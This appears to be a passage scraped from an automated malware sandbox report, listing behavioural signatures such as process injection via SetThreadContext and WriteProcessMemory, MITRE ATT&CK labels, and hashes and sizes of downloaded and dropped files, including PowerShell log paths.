- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.7MB
MD5888f9ab3f2e7e689492fbe05019e4296
SHA1c6981bf46421e55c6ea2274f92a986ae5c98f46a
SHA25687e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d
SHA5121a8fe21cf8bd5708f7142297819020c86387761a82a6de389f3747980ffe839f637274c65bc89a0c22c0ae5a5512d774b48ada2a9dc837363b6e2bfac6c02204
-
Filesize
9.7MB
MD5888f9ab3f2e7e689492fbe05019e4296
SHA1c6981bf46421e55c6ea2274f92a986ae5c98f46a
SHA25687e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d
SHA5121a8fe21cf8bd5708f7142297819020c86387761a82a6de389f3747980ffe839f637274c65bc89a0c22c0ae5a5512d774b48ada2a9dc837363b6e2bfac6c02204
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5a4882daef55eb82f30ad387f85085706
SHA107052dd70bf89dc8e9845556d079275979bfcafb
SHA256148d85590431406d2a732d8a6078928e76aba51c53a2917391c29dd2b0d81a8a
SHA5126cc9a4d9bce1b164f16cc687b8b997da4822f6b5d0bbb9f0a4abe848c08ca484839aac261da2d84ddd29ce3908b39331c8b2e1c9886da27932c8a8bca4af1488
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD52d29fd3ae57f422e2b2121141dc82253
SHA1c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA25680a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5811d351aabd7b708fef7683cf5e29e15
SHA106fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA2560915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5302a7c179ef577c237c5418fb770fd27
SHA1343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA2569e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699